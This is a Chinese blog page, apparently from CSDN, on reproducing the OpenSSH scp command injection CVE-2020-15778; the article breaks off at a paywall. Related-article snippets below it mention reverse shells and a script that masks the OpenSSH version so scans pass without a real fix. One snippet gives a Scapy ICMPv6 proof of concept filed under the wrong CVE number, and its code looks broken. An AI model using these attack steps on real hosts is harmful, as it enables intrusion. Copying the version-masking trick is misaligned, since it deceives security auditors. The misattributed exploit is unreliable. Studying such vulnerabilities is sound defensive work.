CVE-2020-15778漏洞复现学习

原创 已于 2023-10-11 10:33:04 修改 · 1.1k 阅读 · 4 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#学习 #linux #运维

于 2023-03-29 19:37:42 首次发布
本文详细介绍了CVE-2020-15778漏洞,该漏洞允许在OpenSSH 8.3p1及更早版本中注入命令,执行任意命令。通过环境搭建、iptables策略配置,演示了如何在禁用SSH登录仅保留SCP的情况下,利用此漏洞进行命令执行。文章还提供了漏洞复现步骤和总结,强调了此漏洞的危害和利用条件。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

1.漏洞描述

先领282G网络安全资料再阅读

(1)简介:2020年6月9日,研究人员Chinmay
Pandya在Openssh中发现了一个漏洞,于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。该漏洞属于命令执行漏洞,目前绝大多数linux系统受影响。

(2)scp介绍:scp是Linux下基于 ssh
登陆进行安全的远程文件拷贝命,用于不同Linux系统之间复制文件和目录。该命令由openssh的scp.c及其他相关代码实现。在本次漏洞复现中就是利用scp命令把一个kali系统的文件传输给Linux系统。

(3)漏洞类型:命令执行

(4)漏洞影响版本:OpenSSH <= 8.3p1

2.环境搭建

虚拟机安装CentOS和kali靶机环境:CentOS6,ip:192.168.5.138渗透机环境:Kali 2020,ip:192.168.5.130

3.centos机使用iptables策略配置环境,禁用ssh登录,只保留scp。

(1)安装iptables(需要root用户)

yum install -y iptables

安装错误,接下来根据提示删除/var/cache/yum/i386/6/

最低0.47元/天 解锁文章

200万优质内容无限畅学
CVE-2020-15778 OpenSSH scp命令注入漏洞复现
afei001
01-11 524
目录 1.漏洞概述 2.影响版本 3.漏洞等级 4.漏洞复现 4.1 漏洞环境搭建 4.2 利用OpenSSH scp命令注入漏洞反弹shell 5.漏洞成因 6.漏洞修复 1.漏洞概述 2020年7月24号左右,OpenSSH再次爆出漏洞。OpenSSH 8.3p1及之前版本中的scp的scp.c文件存在操作系统命令注入漏洞。该漏洞即使在禁用ssh登录的情况下,但是允许使用scp传文件,而且远程服务器允许使用反引号(`),攻击者可利用scp复制文件到远程服务器时,并...
CVE-2020-15778漏洞复现-kali2020.4&centos7
weixin_43867542的博客
07-19 1348
漏洞名称:openSSH 操作系统命令注入漏洞 等级危害:高危 CVSS评分:7.8 漏洞类型:操作系统命令注入 漏洞概述 OpenSSH(OpenBSD Secure Shell)是Openbsd计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 8.3p1及之前版本中的scp的scp.c文件存在操作系统命令注入漏洞。该漏洞源于外部输入数据构造操作系统可执行命令过程中,网络系统或产
OpenSSH 8.5p1 离线升级修复(CVE-2020-15778漏洞
m0_56279061的博客
03-19 3397
OpenSSH 8.5p1 离线升级修复(CVE-2020-15778漏洞0x000x010x02升级SSH操作步骤0x03 0x00 近日发现 OpenSSH 官网在3月3日发布了 OpenSSH 8.5 版本。作为负责任的资产管理员兼维护者,当然要升级到最新版啦。同时安全部门漏洞检查,也没有扫出频繁出现的两个漏洞。 OpenSSH 输入验证错误漏洞 (CVE-2020-12062) OpenSSH 命令注入漏洞CVE-2020-15778) 0x01 虽说升级简单,通过对官方源码编译就能搞定SSH升
CVE-2020-15778漏洞复现 OpenSSH命令注入(环境搭建+命令执行+反弹shell)
ch4nge
10-27 3280
CVE-2020-15778漏洞复现学习 作者:ch4nge 漏洞名称: OpenSSH 命令注入漏洞(CVE-2020-15778) 等级: 高危 类型:命令执行 影响版本: OpenSSH <= 8.3p1 利用难度:简单 漏洞介绍 漏洞公开披露2020年7月18日,openssh 8.3p1的SCP命令存在命令注入漏洞,攻击者可以利用此漏洞执行任意命令。 1. scp命令 简单来说就是A这里执行scp命令,将A电脑里的文件传输到B电脑(linux系统) 命令格式 scp [参数] [原路径] [
CVE-2020-15778 openssh漏洞修复
N07ME的博客
12-11 7115
漏洞描述 https://access.redhat.com/security/cve/cve-2020-15778 简单来说,就是scp命令是可以注入特殊字段,在目标主机上执行指令的。 原理是因为scp是通过ssh实现的,一样的需要用户名和密码才能登陆。也就是说,这个漏洞其实针对的是那些禁用了ssh但是没禁用scp的主机,针对这些主机,可以从外部通过scp实现和ssh一样的功能。 漏洞修复方案 1.升级到openssh-8.4以上的版本 (要求操作系统版本在centos 8及以上) 2.禁用scp命令 m
CVE-2020-15778漏洞复现
m0_58606546的博客
11-30 3011
1.漏洞描述 (1)简介:2020年6月9日,研究人员Chinmay Pandya在Openssh中发现了一个漏洞,于7月18日公开。OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。该漏洞属于命令执行漏洞,目前绝大多数linux系统受影响。 (2)scp介绍:scp是Linux下基于 ssh 登陆进行安全的远程文件拷贝命,用于不同Linux系统之间复制文件和目录。该命令由openssh的scp.c及其他相关代码实现。在本次漏洞复现中就是利用scp命
网络攻防之CVE-2020-15778漏洞复现及修复详细过程
m0_62574258的博客
02-29 7551
OpenSSH的8.3p1中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。(10)可以看到在监听窗口反弹出靶机的shell(root@localhost),攻击成功,即使靶机通过防火墙禁止了ssh远程登录能通过此漏洞远程控制靶机,在shell中输入ls命令查看靶机的根目录文件。漏洞危害:该漏洞危害性很高, 因为一旦入侵成功,攻击者可以尝试在目标系统上的shell上执行恶意代码,执行各种命令,获取系统信息,上传或下载文件,甚至完全控制目标系统。
CVE-2020-15778 OpenSSH命令注入漏洞复现
zyl404的博客
12-18 576
CVE-2020-15778 OpenSSH命令注入漏洞复现 漏洞描述 OpenSSH是用于使用SSH协议进行远程登录的一个开源实现。通过对交互的流量进行加密防止窃听,连接劫持以及其他攻击。OpenSSH由OpenBSD项目的一些开发人员开发, 并以BSD样式的许可证提供,且已被集成到许多商业产品中。OpenSSH 8.3p1及之前版本中的scp允许在scp.c远程功能中注入命令,攻击者可利用该漏洞执行任意命令。目前绝大多数linux系统受影响。 影响版本 OpenSSH<=8.3p1 环境部署 攻击
CVE-2020-13933 靶场: shiro 认证绕过漏洞.zip
01-14
总体而言,靶场在信息安全领域具有重要地位,为安全专业人员提供了实战演练的机会,促进了团队协作与沟通,为学习者提供了安全的学习环境,同时也是安全社区交流的重要平台。通过靶场的实践操作,安全从业者能够更好...
[ 漏洞复现篇 ] OpenSSH 命令注入漏洞 (CVE-2020-15778)
qq_51577576的博客
08-05 3665
Linux scp 命令用于 Linux 之间复制文件和目录。scp 是 secure copy 的缩写, scp 是 linux 系统下基于 ssh 登陆进行安全的远程文件拷贝命令。scp 是加密的,rcp 是不加密的,scp 是 rcp 的加强版。该漏洞虽然利用很简单,但漏洞危害很大,漏洞等级也属于严重。利用需要知道ssh密码,在测试过程中通常可以配合ssh弱口令一起使用,或者在得知ssh密码的情况下进行使用,这样就可进行反弹shell获取权限了。...
CVE-2020-15778 漏洞复现避坑指南
weixin_45836195的博客
07-20 2879
CVE-2020-15778 漏洞复现避坑指南
修复低版本漏洞:OpenSSH 操作系统命令注入漏洞CVE-2020-15778
qq_18846873的博客
12-18 1286
本次描述的修复方式只适用于应付检查,并不是真正修复,如果真正修复,需要将OpenSSH组件升级到官方最新版本。 查看当前的版本:ssh -V 把脚本中的7.4换成上面查询的结果 #!/bin/bash os=`cat /etc/os-release|grep ID|grep -v VERSION_ID` ssh_status=`systemctl status sshd` if [[ $os =~ "centos" ]];then ssh=`strings /usr/bin/ssh|gre
运维-CVE-2020-15778漏洞修复
Eistert
01-10 8484
漏洞描述 Openssh 命令注入漏洞(CVE-2020-15778)【低可信】 风险等级: 高 漏洞ID: SF-0005-02635 端口(服务): 22(ssh) 风险描述: 【该漏洞通过版本比较方式检测,结果可能不准确,需要根据实际情况确认。】OpenSSH(OpenBSD Secure Shell)是OpenBSD计划组的一套用于安全访问远程计算机的连接工具。该工具是SSH协议的开源实现,支持对所有的传输进行加密,可有效阻止窃听、连接劫持以及其他网络级的攻击。 OpenSSH 8.3p1及之前版
OpenSSH 命令注入漏洞CVE-2020-15778复现
weixin_46236101的博客
12-27 2183
0x00 漏洞介绍 CVE编号:CVE-2020-15778 发布时间:2020-07-24 危害等级:高危 漏洞版本:<= openssh-8.3p1 漏洞描述:OpenSSH 8.3p1及之前版本中的scp的scp.c文件存在操作系统命令注入漏洞。该漏洞即使在禁用ssh登录的情况下,但是允许使用scp传文件,而且远程服务器允许使用反引号(`),可利用scp复制文件到远程服务器时,执行带有payload的scp命令,从而在后续利用中getshell。 利用条件:知道目标的ssh密码 0
CVE-2020-24686 漏洞复现
最新发布
03-23
关于 CVE-2020-24686 漏洞,其主要影响的是 Windows TCP/IP 协议栈中的 ICMPv6 路由器广告处理部分。此漏洞源于对递归 DNS 服务器选项(Type 25)的不当解析,特别是当长度字段设置为偶数值时引发的缓冲区溢出问题[^4]。 以下是针对该漏洞复现所需的关键要素: ### 实验环境搭建 为了成功复现 CVE-2020-24686 漏洞,需准备如下实验环境: 1. **目标操作系统**: 需要运行受影响版本的 Windows 系统,具体包括但不限于 Windows 10 Version 20H2、Windows Server, version 20H2 (Server Core installation) 和其他受支持的操作系统版本。 2. **网络配置**: 设置一个测试网络环境,其中包含一台作为攻击者的机器以及另一台安装有易受攻击操作系统的主机。 3. **工具需求**: - Scapy 或者类似的 Python 库用于构建自定义的 ICMPv6 数据包。 - Wireshark 可选,用来捕获并分析流量以便验证发送的数据包结构是否正确。 ### POC 编写 下面是一个简单的基于 Scapy 的 PoC 示例脚本,它会向指定的目标设备发送恶意构造的 ICMPv6 Router Advertisement 包含非法长度值的 Type 25 Option: ```python from scapy.all import * def exploit(target_ip): eth = Ether(dst="ff:ff:ff:ff:ff:ff") # 广播MAC地址 ip6 = IPv6(src="::", dst=target_ip) icmp6_ra = ICMPv6ND_RA() rdnss_opt = ICMPv6NDOptRDNSS(length=2) # 使用不符合RFC标准的偶数长度 payload = "\x00" * ((rdnss_opt.length*8)-len(rdnss_opt.fields_desc)) + struct.pack("!Q", 0xdeadbeefcafebabe) packet = eth/ip6/icmp6_ra/Raw(load=payload) sendp(packet, iface="eth0") if __name__ == "__main__": target_ip = "fe80::xxxx:yyyy:zzzz:wwww" # 替换为目标的实际链路本地IPV6地址 exploit(target_ip) ``` 上述代码片段通过创建具有特定畸形参数的ICMPv6消息来触发潜在的安全风险。注意替换 `target_ip` 参数为你实际环境中受害节点的有效IPv6链接局部地址。 ### 注意事项 尽管提供了理论基础和技术细节供学习研究之用,在真实世界里实施此类行为违反法律和服务条款规定。仅限于授权范围内的渗透测试活动才允许尝试这些技术手段。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值